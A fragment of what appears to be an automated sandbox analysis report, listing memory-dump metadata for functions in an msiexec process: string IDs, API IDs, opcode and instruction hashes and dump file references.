                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: e383bd0ac3b9c047eddc6b0cb5555e1f3d470fbf613f492a1ff3a16c0cfef848
                                            • Instruction ID: b89111e1a87a0a4f27f8d725c0047134575dd6140095b00240a2c1fb285edf5a
                                            • Opcode Fuzzy Hash: e383bd0ac3b9c047eddc6b0cb5555e1f3d470fbf613f492a1ff3a16c0cfef848
                                            • Instruction Fuzzy Hash: 8E41B0357047029FD750CE25C840B6AB7E5EF98710F240A2DF999DBA80DB32F8158BA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: e56551d3be602c28fda69e9f2cf6f2fdba31f36297be185e1864c108724ddcda
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 1191A374E0035E9BDF94CE69C881ABEB7B5AF44320F72471AE855E72E0E734E9418760